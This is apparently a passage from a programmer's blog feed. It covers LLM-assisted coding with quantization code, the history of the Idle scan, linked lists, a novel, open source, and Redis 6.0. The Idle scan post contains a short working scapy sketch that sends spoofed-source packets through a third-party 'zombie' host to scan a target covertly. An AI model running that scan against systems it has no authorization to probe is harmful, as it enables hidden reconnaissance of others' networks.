    for (int i = 0; i < nb; i++) {

        const float d = GGML_FP16_TO_FP32(x[i].d);

        const uint8_t * restrict ql = x[i].ql;
        const uint8_t * restrict qh = x[i].qh;
        const int8_t * restrict sc = x[i].scales;

        for (int n = 0; n < QK_K; n += 128) {
            for (int l = 0; l < 32; ++l) {
                int is = l/16;
                const int8_t q1 = (int8_t)((ql[l + 0] & 0xF) | (((qh[l] >> 0) & 3) << 4)) - 32;
                const int8_t q2 = (int8_t)((ql[l + 32] & 0xF) | (((qh[l] >> 2) & 3) << 4)) - 32;
                const int8_t q3 = (int8_t)((ql[l + 0] >> 4) | (((qh[l] >> 4) & 3) << 4)) - 32;
                const int8_t q4 = (int8_t)((ql[l + 32] >> 4) | (((qh[l] >> 6) & 3) << 4)) - 32;
                y[l + 0] = d * sc[is + 0] * q1;
                y[l + 32] = d * sc[is + 2] * q2;
                y[l + 64] = d * sc[is + 4] * q3;
                y[l + 96] = d * sc[is + 6] * q4;
            }
            y += 128;
            ql += 64;
            qh += 32;
            sc += 8;
        }
    }
}

If I ask GPT4 to write an outline of the format used, it struggles to provide a clear explanation of how the blocks are stored on the lower / upper 4 bits of “ql” depending on the weight position. For this blog post, I also tried asking it to write a simpler function that shows how data is stored (maybe it can’t explain it with words, but can with code). The produced function is broken in many ways, the indexes are wrong, the 6-bit -> 8-bit sign extension is wrong (it just casts to uint8_t), and so forth.

Btw, this is the code that I ended writing myself:

} else if (tensor->type == GGUF_TYPE_Q6_K) {
    uint8_t *block = (uint8_t*)tensor->weights_data;
    uint64_t i = 0; // i-th weight to dequantize.
    while(i < tensor->num_weights) {
        float super_scale = from_half(*((uint16_t*)(block+128+64+16)));
        uint8_t *L = block;
        uint8_t *H = block+128;
        int8_t *scales = (int8_t*)block+128+64;
        for (int cluster = 0; cluster < 2; cluster++) {
            for (uint64_t j = 0; j < 128; j++) {
                f[i] = (super_scale * scales[j/16]) *
                       ((int8_t)
                        ((((L[j%64] >> (j/64*4)) & 0xF) |
                          (((H[j%32] >> (j/32*2)) & 3) << 4)))-32);
                i++;
                if (i == tensor->num_weights) return f;
            }
            L += 64;
            H += 32;
            scales += 8;
        }
        block += 128+64+16+2; // Go to the next block.
    }
}

From the function above, I removed what was the actual contribution of this code: the long comments documenting the exact format used by the llama.cpp Q6_K encoding. Now, it would be immensely useful if GPT could do this for me, and I bet it’s just a matter of months, because this kind of task is within what can be reached without any breakthrough, just with a bit of scaling.

# Putting Things in Perspective

I regret to say it, but it's true: most of today's programming consists of regurgitating the same things in slightly different forms. High levels of reasoning are not required. LLMs are quite good at doing this, although they remain strongly limited by the maximum size of their context. This should really make programmers think. Is it worth writing programs of this kind? Sure, you get paid, and quite handsomely, but if an LLM can do part of it, maybe it's not the best place to be in five or ten years.

And then, do LLMs have some reasoning abilities, or is it all a bluff? Perhaps at times they seem to reason only because, as semioticians would say, the "signifier" gives the impression of a meaning that does not actually exist. Those who have worked enough with LLMs, while accepting their limits, know for sure that it cannot be so: their ability to blend what they have seen before goes well beyond randomly regurgitating words. Even though their training was mostly carried out in pre-training, by predicting the next token, this goal forces the model to create some form of abstract model. This model is weak, patchy, and imperfect, but it must exist if we observe what we observe. If our mathematical certainties are doubtful and the greatest experts are often on opposing positions, believing what one sees with one's own eyes seems a wise approach.

Finally, what sense does it make today not to use LLMs for programming? Asking LLMs the right questions is a fundamental skill. The less it is practiced, the less one will be able to improve their work thanks to AI. And developing a descriptive ability for problems is also useful when talking to other human beings: LLMs are not the only ones who sometimes don't understand what we want to say. Communicating poorly is a great limitation, and many programmers communicate very poorly despite being very capable in their specific field. And now that Google is unusable, using LLMs even just as a compressed form of documentation is a good idea. For my part, I will continue to make extensive use of them. I have never loved learning the details of an obscure communication protocol or the convoluted methods of a library written by someone who wants to show off how good they are. It seems like "junk knowledge" to me. LLMs save me from all this more and more every day.
The origins of the Idle Scan - http://antirez.com/news/139 - Thu, 19 Oct 2023
Hping was a Swiss Army knife for the TCP/IP protocol. Its initial use was mostly exploratory, for research. With Hping, you could assemble TCP, UDP, and ICMP packets in the most bizarre manner, and encapsulate them in equally eccentric IP packets, fragmented, with fields set to anomalous values. These packets were sent around to observe the network stack response of different operating systems.

This is where the Idle scan originates: playing with Hping for just a few minutes revealed a well-known yet (to me) surprising fact. The response packets had an IP ID field that kept incrementing. At that time, given that the attacks I would later disclose were not yet known, this ID field behavior aroused no concern. Every time an operating system emitted an IP packet, it first incremented a counter (which reset to zero once it reached the maximum value of two to the sixteenth power minus one), then the packet was sent with the ID set to the counter's value. The counter was global for all outgoing packets. This allowed, for starters, estimating the outgoing traffic of any networked computer. This information leak struck me; I saw it as a concerning anomaly. I wrote an initial post on BUGTRAQ, highlighting the issue. Among the responses was one from an Internet luminary, someone who had drafted central RFCs for the TCP/IP protocol. He said that, yes, they were aware; it was a well-known fact. In short: although this characteristic could be used for traffic estimation, most saw no risk. And resolving the issue, deemed negligible, would require a significant overhaul of operating systems. Not worth it.

But I was losing sleep over it, hardly a secondary issue to me. I was convinced that the information provided by the incrementing ID field could be combined with other elements (which I had not fully grasped yet) to mount a far more serious attack. I discussed it with Lorenzo Cavallaro. Lorenzo had introduced me to raw socket techniques months earlier, which I had used to write Hping. He had become my go-to conversational partner, as well as a dear friend; if I had to ponder on TCP/IP-related matters, I would discuss them with him. When I told him about these new ideas, I had to be vague, not by choice but because I hadn't yet pieced together the final attack. Despite my vagueness, he appeared fairly interested.

A couple of days later, I spoke to him again. Finally, I managed to give him a more comprehensive description of the Idle scan (not yet named as such). I had reasoned it out on paper, as there was no way to test it practically. If I remember correctly, Hping was missing some of the necessary functions, although I wouldn't bet on this part: it's been twenty-five years. My memory clears as I write. I believe you couldn't choose the exact flags of the outgoing TCP packet. Anyway, from what I remember, the modifications to Hping took little time, so we were able to test my theory in practice as well. The Idle scan really worked, and proving it in real conditions was very exciting. I don't remember who made this parallel, but essentially, it was like observing the movement of an invisible celestial body indirectly, measuring only its gravitational effects on another, more easily observable body, much like the discovery of Pluto.
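
For readers who want the mechanics in a concrete form, here is a minimal sketch of the attack logic using the scapy Python library (the helper names are mine, the hosts and port are placeholders, and a real scan requires a truly idle "zombie" host and root privileges):

from scapy.all import IP, TCP, send, sr1

def zombie_ipid(zombie):
    # An unsolicited SYN/ACK elicits a RST from the zombie; its IP ID
    # leaks the global outgoing-packet counter described above.
    r = sr1(IP(dst=zombie)/TCP(dport=80, flags="SA"), timeout=2, verbose=0)
    return r[IP].id if r else None

def port_probably_open(zombie, target, port):
    before = zombie_ipid(zombie)
    # Spoofed SYN: if the port is open, the target SYN/ACKs the zombie,
    # which answers with a RST, incrementing its counter one extra time.
    send(IP(src=zombie, dst=target)/TCP(dport=port, flags="S"), verbose=0)
    after = zombie_ipid(zombie)
    return (after - before) % 65536 >= 2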

All that was left was to make the attack public. Unfortunately, the thought of writing a lengthy email in English terrified me. I was aware that the Idle scan was an interesting idea, and precisely because of that, I was afraid of botching its announcement with a poor presentation. After all, the attack was cumbersome; it could even end up being described so poorly as to be incomprehensible. Lorenzo and I wrote that email late at night, at my place, certainly drunk. Better than writing it alone; Lorenzo's English, even if only slightly, was better than mine. It happened that a colleague from Seclab (also one of the founders), whom I consider a true genius in information security, came from a family of restaurateurs from Emilia. One evening he shows up at my place with a bag. Inside the bag is a fine piece of grey mullet roe, which I had never seen, let alone tasted (it would become one of my favorite foods). The cook-hacker prepares pasta for all of us, and together we eat and drink plenty. At the end of the evening, the others leave (there was someone else, besides the cook-hacker), but Lorenzo stays a bit longer.

That evening, Lorenzo and I, fairly tipsy, recklessly thought the time had come to write the Idle scan announcement email (still preserved in the BUGTRAQ archives, and which today appears genuinely delirious [1]). We sit down at my PC to work. The email opens like this: "I have uncovered a new tcp port scan method. Instead all others it allows you to scan using spoofed packets, so scanned hosts can't see your real address." Not just the grammar, even the peremptory tone of the email is utterly inappropriate. To top it off, we propose calling the attack "dumb host scan", but fortunately someone quickly finds a better name, which became the official one: Idle scan. Long story short, despite its flawed origins, the Idle scan has become a classic attack, and it's safe to say, as is often the case, that the rest is history.

[1] https://seclists.org/bugtraq/1998/Dec/79
In defense of linked lists - http://antirez.com/news/138 - Fri, 04 Nov 2022
So, get ready to read a sentimental post about a data structure, and don't say I didn't warn you.

Linked lists are educational. When your teacher, or the page of a book, or whatever exposes you to linked lists for the first time shows you that little circle with an arrow pointing to another circle, something immense happens in your mind. Similar to what happens when you understand recursion for the first time. You get what data structures made of links truly are: the triviality of a single node that becomes a lot more powerful and complex once it references another one. Linked lists show the new programmer fundamental things about space and time in computation: how it is possible to add elements in constant time, and how order is fundamentally costly, because if you want to insert an element “in place” you have to walk from one node to the next. You immediately start thinking of ways to speed up the process (preparing you for what comes next), and at the same time you understand, deeply, what O(1) and O(N) really mean.

Linked lists are augmentable. Add a pointer to the previous element, and now it is possible to go both ways. Add “far” pointers from time to time, and you have a skip list, with completely different properties. Change every node to hold multiple items, and your linked list becomes unrolled, with very different cache locality properties. Linked lists can be embedded, too: the Linux kernel, for instance, has macros to add a field to any structure in order to link them together. There is more: linked lists are composable. This is a remarkable property: you can split a linked list into two in O(1), and you can glue two linked lists together in O(1) as well. If you make judicious use of this property, interesting things are possible. For instance, in Redis modules implementing threaded operations, the thread processing the slow request dealt with a fake client structure (this way there was no locking, no contention). When the threaded command finally ended its execution, the output buffer of the fake client could be glued to the actual buffer of the real client. This was easy because the output buffer was represented with a linked list.
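
As a toy illustration of the composability point, here is a minimal sketch in Python (the class names are mine; a C version with embedded nodes would look different, but the O(1) logic is the same):

class Node:
    def __init__(self, value):
        self.value = value
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = self.tail = None

    def append(self, value):
        # O(1): no traversal, just update the tail pointer.
        node = Node(value)
        if self.tail: self.tail.next = node
        else: self.head = node
        self.tail = node

    def glue(self, other):
        # O(1): joining two lists is a couple of pointer assignments.
        if not other.head: return
        if self.tail: self.tail.next = other.head
        else: self.head = other.head
        self.tail = other.tail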

Linked lists are useful: Redis can be wrong, but both Redis and the Linux kernel can’t. They are useful because they resemble certain natural processes: adding things in the order they arrive, or in the reverse order, is natural even in the physical world. Pulling items incrementally is useful too, as is moving such items from head to tail, or moving them one position past the current one.

Linked lists are simple. They are one of those rare data structures, together with binary trees, hash tables and a few more, that you can implement just from memory without likely stepping into big errors.

Linked lists are conceptual. A node pointing to itself is the most self-centered thing I can imagine in computing: an ideal representation of the more vulgar infinite loop. A node pointing to NULL is a metaphor of loneliness. A linked list with tail and head connected, a powerful symbol of a closed cycle.

For all those reasons, I love linked lists, and I hope that you will, at least, start smiling at them.
Scrivendo Wohpe - http://antirez.com/news/137 - Sun, 17 Jul 2022
Dopo due anni di lavoro, finalmente, Wohpe, il mio primo libro di fantascienza, ma anche il mio primo scritto di prosa di questa lunghezza, è uscito nelle librerie fisiche italiane, su Amazon, e negli altri store digitali. Lo trovate qui: https://www.amazon.it/Wohpe-Salvatore-Sanfilippo/dp/B09XT6J3WX

Dicevo: il primo scritto di questa lunghezza. Ma posso considerarmi del tutto nuovo alla scrittura? Ho scritto per vent’anni in questo blog e in quelli passati che ho tenuto nel corso del tempo, e molto spesso ho usato Facebook per scrivere brevi racconti, frutto di fantasie o basati su fatti reali. Oltre a ciò, ho scritto di cose tecniche, specialmente riguardo la programmazione, per un tempo altrettanto lungo, e sono stato un lettore di racconti e di romanzi per tutto il corso della mia vita. E allora perché scrivere Wohpe è stato anche imparare a scrivere da zero?

Nei primi mesi di scrittura del romanzo, ma anche prima, nei mesi precedenti, quando mi preparavo scrivendo lunghi racconti che poi avrei cestinato, mi è successo ciò che accade spesso a coloro che imparano a giocare a scacchi. Tanti seguono questo percorso: imparano le regole, e va bene, lo sappiamo che con quelle si fa poco; le regole permettono solo di muovere i pezzi in maniera legale. Ma poi, subito dopo, imparano dei rudimenti di tecnica e di strategia, magari studiando duramente per qualche settimana. Però quando sono alla scacchiera, se una mossa non è brutalmente peggiore o migliore di un’altra, tutte le mosse sembrano equivalenti. Il giocatore di scacchi poco abile, poco esperto, non ha un vero gusto per le mosse; non riesce a valutarle non solo per ciò che sono in termini assoluti, ma neanche secondo una sua propria idea. Il risultato è un gioco casuale. Solo più avanti, dopo molte ore di gioco, ella finalmente riuscirà a esprimere delle scelte che, a prescindere dal fatto siano esse giuste o sbagliate, hanno quantomeno una coerenza, sono state davvero pensate: voglio muovere il cavallo qui, per queste precise ragioni, e per tali ragioni preferisco questa mossa a tutte le altre possibili.

Così chi scrive ed è agli inizi, se una frase è buona, con certezza non lo sa (e per continuare col paragone di sopra, così come il gioco dello scacchista sarà casuale, la sua scrittura sarà casuale). Sposta una virgola, cambia una parola. Suona bene o male? Ha delle idee che si è formato scrivendo a scuola e poi scrivendo da adulto, ma queste idee lo assistono poco quando l’ambizione è quella di scrivere una prosa di livello letterario. L’autore alle prime armi non ha un suo stile, perché prima di non saper scrivere non sa ancora leggere: quando legge un libro che adora, raramente capisce esattamente *cosa* accade nella pagina di così convincente, e così anche quando rilegge se stesso, non sa se ha scritto bene o male. Leggi, se vuoi imparare a scrivere! Dicono tutti. Peccato non sia vero: bisogna prima di tutto scrivere per imparare a scrivere, così come bisogna fare dei cortometraggi per imparare a fare il regista, e guardare gli altri film non sarà sufficiente (anche se sarà certamente utile). E per imparare a scrivere, il tipo di lettura che serve davvero è la rilettura di alcuni libri che abbiamo scelti come modelli; quello sì che è utile: la rilettura per comprenderne le forme, fino in fondo. Ora questo semplice fatto, di aver capito quale sia il mio stile, e di saper finalmente leggere e avere un giudizio che emerge immediatamente quando ho tra le mani un’opera, è già un risarcimento più che sufficiente dei due anni di sforzi di scrittura nei quali mi sono profuso.

And it is truly lucky that the experience itself was of such great value, because what many new authors do not know is how brutal the world publishing market can be, and the Italian one in particular. In Italy, a science fiction book that does well, published by a small or medium publisher, sells 500 copies. It has to go well to reach those numbers. Most books sell fewer than 100 copies. To us computer people these figures are chilling. The dumbest program I ever wrote had ten times more users. I would go as far as saying that the dumbest program I wrote and published with a minimum of energy had ten times that number of *readers*, people who read its source code to understand how it worked. I have been, and for this I thank I am not sure whom, a programmer of a certain notoriety, you will say. But what I mean goes far beyond my personal experience. Even people nobody knows, who attempt something moderately interesting in programming, as long as it is well described and documented, and show it around a bit, receive enormous interest compared to what fiction authors get. The reasons are many and fairly obvious, it is not even worth dwelling on them, so why am I telling you these things? For this reason:

There are few activities, besides literature, with the same monstrous imbalance between the effort needed to produce a work and the meager response of the public. Whoever decides to devote a lot of time to writing must know this fact from the start. Luckily I already knew everything, thanks to my writer friends; still, certain nuances of this irrelevance end up being hard to accept.

So why does everyone write? The ranks of those trying their editorial luck are overflowing. I believe it is a mechanism similar to what happens in IT, with so many people trying to create a new programming language: failure is almost certain, but the attempt itself is one of the most satisfying endeavors to which one can devote one's best energies.

Now I am at a crossroads: I could write more prose, go back to writing code, or try to keep both activities alive at the same time. What I will do, I do not know yet. For now, let's see what happens with Wohpe, both with the Italian version and with the English translation, which a capable translator is working on right now. And about this matter of translations carried out with the support of the author, and what a significant experience it is from the philological point of view, maybe I will tell you some other time (Bridget and I both speak English and Italian, but she is a native speaker of one language and I of the other, which is very interesting when translator and author collaborate). I close the post by telling whoever reads me: if you feel like it, write prose! Now I know it for certain: it is no accident that for hundreds of years writing was considered the highest art in which to try one's hand. Writing, you search for things, and if you insist enough you really end up finding them. Comments]]>
http://antirez.com/news/137
Writing Wohpe http://antirez.com/news/136 http://antirez.com/news/136 Sun, 17 Jul 2022 09:31:06 +0000
[Sorry for the form of this post. For the first time I wrote a post in two languages: Italian and English. So I went for the unusual path of writing it in Italian to start, translating it with Google Translate, and later I just scanned it to fix the biggest issues. At this point GT is so good you can get away with this process.]

After two years of work, finally, Wohpe, my first science fiction book, but also my first prose writing of this length, has been released in Italian physical bookstores, on Amazon, and in other digital stores. You can find it here: https://www.amazon.it/Wohpe-Salvatore-Sanfilippo/dp/B09XT6J3WX

I was saying: the first piece of writing of this length. But can I consider myself entirely new to writing? I have written for twenty years on this blog and on the past ones that I kept over time, and very often I have used Facebook to write short stories, born of fantasy or based on real events. On top of that, I've been writing about technical stuff, especially programming, for an equally long time, and I've been a short story and novel reader my entire life. So why did writing Wohpe also mean learning to write from scratch?

In the first months of writing the novel, but also earlier, in the previous months, when I was preparing myself by writing long stories that I would then throw away, what happened to me is what often happens to those who learn to play chess. Many follow this path: they learn the rules, and that's okay, we know that you don't get far with them; the rules only allow you to move pieces legally. But then, soon after, they learn some rudiments of tactics and strategy, perhaps studying hard for a few weeks. But when they are at the board, if one move is not brutally worse or better than another, all the moves seem equivalent. The unskilled, inexperienced chess player has no real taste for moves; she fails to evaluate them not only for what they are in absolute terms, but not even according to her own idea. The result is random play. Only later, after many hours of play, will she finally be able to express choices that, regardless of whether they are right or wrong, have at least a coherence, that were really thought out: I want to move the knight here, for these precise reasons, and for these reasons I prefer this move to all the other possible ones.

So whoever writes and is at the beginning, if a sentence is good, he certainly does not know it (and to continue with the above comparison, just as the chess player's play will be random, his writing will be random). He moves a comma, changes a word. Does it sound good or bad? He has ideas that he formed by writing at school and then by writing as an adult, but these ideas help him little when the ambition is to write prose of literary quality. The novice author does not have his own style, because before not knowing how to write, he does not yet know how to read: when he reads a book he adores, he rarely understands exactly *what* happens on the page that is so convincing, and so also when he rereads himself, he does not know if he wrote well or badly. Read, if you want to learn to write! They all say. Too bad it's not true: first of all you have to write to learn how to write, just as you have to make short films to learn to be a director, and watching other films will not be enough (although it will certainly be useful). And to learn to write, the kind of reading that is really needed is the rereading of some books that we have chosen as models; that is what is useful: rereading to fully understand their forms. Now this simple fact, of having understood what my style is, and of finally knowing how to read and having a judgment that immediately emerges when I have a work in my hands, is already more than enough compensation for the two years of writing effort I poured into this.

And it is fortunate that the experience itself was of such great value, because what many new authors do not know is how brutal the world publishing market can be, and the Italian one in particular. In Italy a science fiction book that has a good success, published by a small or medium publisher, sells 500 copies. It has to do well to reach those numbers. Most books sell fewer than 100 copies. To us computer people these figures are chilling. The stupidest program I wrote had ten times as many users. I would go as far as to say that the stupidest program I've written and published with a minimum of energy has had ten times that many *readers*, people who read its source code to understand how it worked. I have been, and for this I thank I don't know whom, a programmer of a certain notoriety, you might say. But what I mean goes far beyond my personal experience. Even those who are known by nobody, and try to do something moderately interesting in programming, as long as it is well described and documented, and show it around a bit, receive enormous interest compared to what fiction authors get. The reasons are many and quite obvious, it is not even worth dwelling on them, so why am I telling you these things? For this reason:

There are few activities, besides literature, where there is the same monstrous imbalance between the effort needed to produce a work and the meager response of the public. Anyone who decides to devote a lot of time to writing must know this fact right away. Fortunately, I already knew everything, thanks to my writer friends; however, certain nuances of this irrelevance still end up being difficult to accept.

So why does everyone write? The ranks of those who try their editorial luck are overflowing. I think it's a mechanism similar to what happens in IT, with many trying to create a new programming language: failure is almost certain, but the attempt itself is one of the most satisfying endeavors to devote your best energy to.

Now I'm at a crossroads: I could write more prose, get back to coding, or try to keep the two activities alive at the same time. What I'll do I don't know yet. For now, let's see what happens with Wohpe, both with the Italian version and with the English translation, which a capable translator is working on right now. And on this matter of translations, carried out with the support of the author, and what a significant experience it is from the philological point of view, maybe I will talk to you some other time (Bridget and I both speak English and Italian, but she is a native speaker of one language and I of the other, and this is very interesting when translator and author collaborate). I close the post by saying to those who read me: if you feel like it, write prose! I now know for sure: it is no coincidence that for hundreds of years writing has been considered the highest art in which to try one's hand. By writing you search for things, and if you insist enough you really end up finding them. Comments]]>
http://antirez.com/news/136
Programming and Writing http://antirez.com/news/135 http://antirez.com/news/135 Fri, 14 May 2021 09:47:18 +0000
The most obvious parallel between the two activities is that in both of them you write something. Code is not prose written in a natural language, yet it has a set of fixed rules (a grammar), certain forms that most programmers will understand as natural and others that, while formally correct, will sound hard to grasp.
There is, however, a much deeper connection between the two activities: a good program and a good novel are both the sum of local and global elements that work well. Good code must be composed of well written and readable single statements, but overall the different parts of the program must be orthogonal, designed in a coherent way, and have clean interactions. A good novel must also succeed in the same two scales of the micro and the macro. Sentences must be well written, but the overall structure and relationship between the parts is also crucial.

A less structural link between programming and writing is in the drive you need when approaching one or the other: to succeed you need to make progress, and to make progress you have to be consistent. There is extensive agreement on the fact that programs and novels don’t write themselves, yet. Twenty years of writing code helped me immensely with this aspect; I knew that things happen only if you sit every day and write: one day a hundred words, another day two thousand, but rare is the day I don’t put words on the page. And if you have written code that is not just a “filler” for a bigger system, but a creation of your own, you know that writer’s block also happens in programming. The only difference is that for most people you are an engineer, hence, if you don’t work, you are lazy. The same laziness, in the case of an artist, will assume the shape of a fascinating part of the creative process.

The differences.

I believe the sharpest difference between writing and programming is that, once written, edited and finalized, a novel remains immutable, mostly. There are several cases of writers returning to their novels after several years, publishing a bug-fixed version, but this is rare and, even when it happens, a one-shot process. Code evolves over time, is targeted by an endless stream of changes, often performed by multiple people. This simple fact has profound effects on the two processes: programmers often believe that the first version of a system can be quite imperfect; after all there will be time to make improvements. On the other hand writers know they have a single bullet for every novel, to the point that writing prose is mostly the act of rewriting. Rewriting sentences, whole chapters, dialogues that sound fake, sometimes two, three, or even ten times.

I believe programming, in this regard, can learn something from writing: when writing the first core of a new system, when the original creator is still alone, isolated, able to do anything, she should pretend that this first core is her only bullet. During the genesis of the system she should rewrite this primitive kernel again and again, in order to find the best possible design. My hypothesis is that this initial design will greatly inform what will happen later: growing organically something that has a good initial structure will result in a better system, even years away from the original creation, and even if the original core was just a tiny fraction of the future mass the system would eventually assume.

In case you are interested, a quick update about my sci-fi novel. After many self-reviews I sent the manuscript to my editor, Giulio Mozzi. He will send me the change proposals in a few weeks. I’ll start a new review process informed by his notes, and hopefully finalize the novel in one or two months. Then, finally, I’ll be ready to publish the Italian version. At the same time the finalized novel will be sent to my translator, in the US, and when she finishes the translation the English version will be published as well. It’s a long journey, but one that I deeply enjoyed taking. Comments]]>
http://antirez.com/news/135
The open source paradox http://antirez.com/news/134 http://antirez.com/news/134 Sat, 03 Oct 2020 09:11:59 +0000
As somebody said, the best code is written when you are supposed to do something else [1]. Like a writer will do her best when writing that novel that, maybe, nobody will pay a single cent for, and not when doing copywriting work for a well known company, programmers are likely to spend more energy in their open source side projects than during office hours, while writing another piece of a project they feel is stupid, boring, pointless. And, if the company is big enough, chances are it will be cancelled in six months anyway or retired one year after the big launch.

Open source is different, it’s an artifact, it’s a transposition in code of what you really want to do, of what you feel software should be, or just of all your fun and joy, or even anger you are feeling while coding. And you want it to rock, to be perfect, and you can’t sleep at night if there is a fucking heisenbug. So if a user of your software is addressing you because some part of your code sucks, and is willing to work with you to do something about it, and is very demanding, don’t think they are abusing you because they are not paying you. It’s not about money. You can ignore bugs if you want, and ignore their complaints, you can do that since you don’t have a contract to do otherwise, but they are helping you, they care about the same thing you care about: your software’s quality, grandiosity, perfection.

The real right you have, and often don’t exploit, is that you are the only one that can decide about the design of your software. So you are entitled to refuse a pull request, or a proposal to follow good practices, because you feel that what somebody is contributing does not fit in the big picture of what you are designing and building.

But if you recognize that somebody is talking to you about something that is, really, a defect in your software, don’t make the mistake of reducing the interaction to a vile matter of money. You are doing work for free, they are risking their asses deploying what you wrote, and you both care about quality.

EDIT: If you write OSS and you are upset about user demands, have you ever thought that maybe, at this point, your work is more similar to office work for some reason?

EDIT 2: A HN user asked the reasons for such a title. The paradox is that the OSS writer often cares about, and is willing to fix, the code she writes for free more than the paid work she does.

[1] "The best programs are the ones written when the programmer is supposed to be working on something else." - Melinda Varian. https://twitter.com/CodeWisdom/status/1309470447667421189 Comments]]>
http://antirez.com/news/134
The end of the Redis adventure http://antirez.com/news/133 http://antirez.com/news/133 Tue, 30 Jun 2020 13:00:16 +0000
But now Redis is, incredibly, one of the main parts of so many things. And year after year my work changed from building this thing to making sure that it was also as useful as possible, as reliable as possible. And in recent years, what I do every day changed so much that most of my attention is spent in checking what other developers tell me about the Redis code, how to improve it, the changes it requires to be more correct or faster or more secure. However I never wanted to be a software maintainer.

I write code in order to express myself, and I consider what I code an artifact, rather than just something useful to get things done. I would say that what I write is useful just as a side effect, but my first goal is to make something that is, in some way, beautiful. In essence, I would rather be remembered as a bad artist than a good programmer. Now I’m asked more and more, by the circumstances created by a project that became so important, to express myself less and to maintain the project more. And this is indeed exactly what Redis needs right now. But this is not what I want to do, and I stretched myself enough during the past years.

So, dear Redis community, today I’m stepping back as the Redis maintainer. My new position will be, on one side, an “ideas” person at Redis Labs, in order to provide inputs for new Redis possibilities: I’ll continue to be part of the Redis Labs advisory board. On the other hand my hands will be free, and I’ll do something else, that could be writing code or not, who knows: I don’t want to make plans for now. However I’m very skeptical that I will not write code anymore in the future. It’s just too much fun :D

I leave Redis in the hands of the Redis community. I asked my colleagues Yossi Gottlieb and Oran Agra to continue to maintain the project starting from today: these are the people that helped me the most in recent years, and that tried hard, even when it was not “linear” to follow me in my very subjective points of view, to understand what my vision on Redis was. Since I don’t want to be part of how the new Redis development setup will be shaped (that is the most meta of the maintenance tasks, exactly what I want to avoid), I’ll just leave Yossi and Oran the task of understanding how to interface with the rest of the Redis developers to find a sustainable development model. You can hear directly from Yossi and Oran in this blog post: https://redislabs.com/blog/new-governance-for-redis/

I believe I’m not just leaving Redis in the hands of a community of expert programmers, but also in the hands of people who care about the legacy of the community spirit of Redis. In eleven years I hope I was able to provide a point of view that certain persons understood, about an alternative way to write software. I hope that such point of view will be taken into consideration in the evolution of Redis.

Redis was the most stressful thing I did in my career, and probably also the most important. I don’t like much what the underground programming world became in recent years, but even if it was not an easy journey, I had the privilege to work and interact with many great individuals. Thank you for your humanity and your help, and for what you taught me. You know who you are! I want to also say thank you to the companies and individuals inside such companies that allowed me to write open source every day for so many years, with the freedom to do what I believed to be correct for the user base. Redis Labs, VMware and Pivotal, thank you for your great help and generosity.

As I said, I don’t really know what there is for me in my future, other than the involvement with the Redis advisory board. I guess that for some time, just looking around is a good idea, without doing too many things. I would like to explore a few hobbies of mine more. Writing blog posts is also a major thing that I wanted to do but did less and less because of time concerns. Recently I published videos in the Italian language explaining technological concepts to the general public; I had fun doing that and received good feedback, so maybe I’ll do more of that as well. Anyway I guess some of you know that I’m active on Twitter as @antirez. If you are interested in what an old, strange programmer will do next, see you there. Comments]]>
http://antirez.com/news/133
Redis 6.0.0 GA is out! http://antirez.com/news/132 http://antirez.com/news/132 Thu, 30 Apr 2020 13:33:35 +0000
So the big news is what was announced before, but with some notable changes. The old stuff is: SSL, ACLs, RESP3, Client side caching, Threaded I/O, Diskless replication on replicas, Cluster support in redis-benchmark and improved redis-cli cluster support, Disque in beta as a module of Redis, and the Redis Cluster Proxy (now at https://github.com/RedisLabs/redis-cluster-proxy).

So what changed between RC1 and today, other than stability?

1. Client side caching was redesigned in certain aspects, especially the caching slot approach was discarded in favor of just using key names. After analyzing the alternatives, with the help of other Redis core team members, in the end this approach looks better. Other than that, the feature was finally completed with the things I had in the backlog for it, especially the “broadcasting mode”, which I believe will be one of the most popular ways to use the feature.

When broadcasting is used, the server no longer tries to remember what keys each client requested. Instead clients subscribe to key prefixes: they’ll get notifications every time a key matching the prefix is modified. This means more messages (but only for the selected prefixes), and no memory effort on the server side. Moreover the opt-in / opt-out mode is now supported, so clients not using the broadcasting mode can tell the server exactly what they will cache, to reduce the number of invalidation messages. Basically the feature is now much better both when a low-memory mode is needed, and when a very selective (low-bandwidth) mode is needed.
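For instance, a client interested only in certain prefixes can enable the broadcasting mode like this (the prefix names are just for the example):

CLIENT TRACKING on BCAST PREFIX user: PREFIX object:

While a client that wants full control can enable the opt-in mode, flagging only the reads whose keys it will actually cache:

CLIENT TRACKING on OPTIN
CLIENT CACHING yes
GET user:1000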

2. This was an old request by many users. Now Redis supports a mode where RDB files used for replication are immediately deleted if no longer useful. In certain environments it is a good idea to never have the data around on disk, but just in memory.
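The behavior is controlled by a redis.conf directive; assuming the option name did not change at the last minute, enabling it looks like this:

rdb-del-sync-files yes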

3. ACLs are better in a few regards. First, there is a new ACL LOG command that allows you to see all the clients that are violating the ACLs, accessing commands they should not, accessing keys they should not, or failing authentication attempts. The log is actually in memory, so every external agent can call “ACL LOG” to see what’s going on. This is very useful in order to debug ACL problems.

But my favorite feature is the reimplementation of ACL GENPASS. Now it uses an HMAC based on SHA256, and accepts an optional argument to tell the server how many bits of unguessable pseudorandom string you want to generate. Redis seeds an internal key at startup from /dev/urandom, and later uses the HMAC in counter mode in order to generate the other random numbers: this way you can abuse the API and call it every time you want, since it will be very fast. Want to generate an unguessable session ID for your application? Just call ACL GENPASS. And so forth.
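For example, asking for the default 256 bits, or explicitly for 128 (the outputs below are of course just made-up hex strings of the right length):

ACL GENPASS
"dd721260bfe1b3d9601e7fbab36de6d04e2e67b0ef1c53de59d45950db0dd3cc"
ACL GENPASS 128
"d11ea2d2a9563ffd6dfd44ea5e0ec9b7"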

4. PSYNC2, the replication protocol, is now improved. Redis will be able to partially resynchronize more often, since it is now able to trim the final PINGs in the protocol, making it more likely that replicas and masters can find a common offset.

5. Redis commands with timeouts are now much better: not only do BLPOP and the other commands that used to accept seconds now accept decimal numbers, but the actual resolution was improved so that it is never worse than the current “HZ” value, regardless of the number of clients connected.
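So, for instance, it is now possible to block for just a tenth of a second:

BLPOP mylist 0.1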

6. RDB files are now faster to load. You can expect a 20/30% improvement, depending on the actual composition of the file (larger or smaller values). INFO is also faster now when there are many connected clients: this was a long-standing problem that is finally gone.

7. We have a new command, STRALGO, that implements complex string algorithms. For now the only one implemented is LCS (longest common subsequence), an important algorithm used, among other things, in order to compare the RNA of coronaviruses (and in general the DNA and RNA of other organisms). What is happening is too big; somehow a trace of it needed to remain inside Redis.
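A quick taste of the command, with made-up keys:

MSET key1 ohmytext key2 mynewtext
STRALGO LCS KEYS key1 key2
"mytext"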

